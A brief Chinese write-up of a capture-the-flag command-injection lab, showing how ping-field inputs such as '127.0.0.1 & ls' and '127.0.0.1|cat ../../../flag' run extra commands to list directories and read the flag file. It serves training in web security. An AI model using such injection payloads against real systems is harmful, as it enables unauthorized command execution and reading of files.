命令执行,使用
;
或者|
进行注入
打开靶场
先ping一下本机地址,有回显
猜测为命令执行漏洞
命令执行漏洞可看https://blog.csdn.net/hintll/article/details/117790643
试一下这个:
127.0.0.1 & ls
发现一个index.php文件,访问index.php文件
发现回到了原始界面
使用|进行注入,一级级去寻找根目录,
构造payload去一级一级找flag:
127.0.0.1|ls ../../../
之后使用cat命令读取flag目录中的内容
127.0.0.1|cat ../../../flag
最终得到flag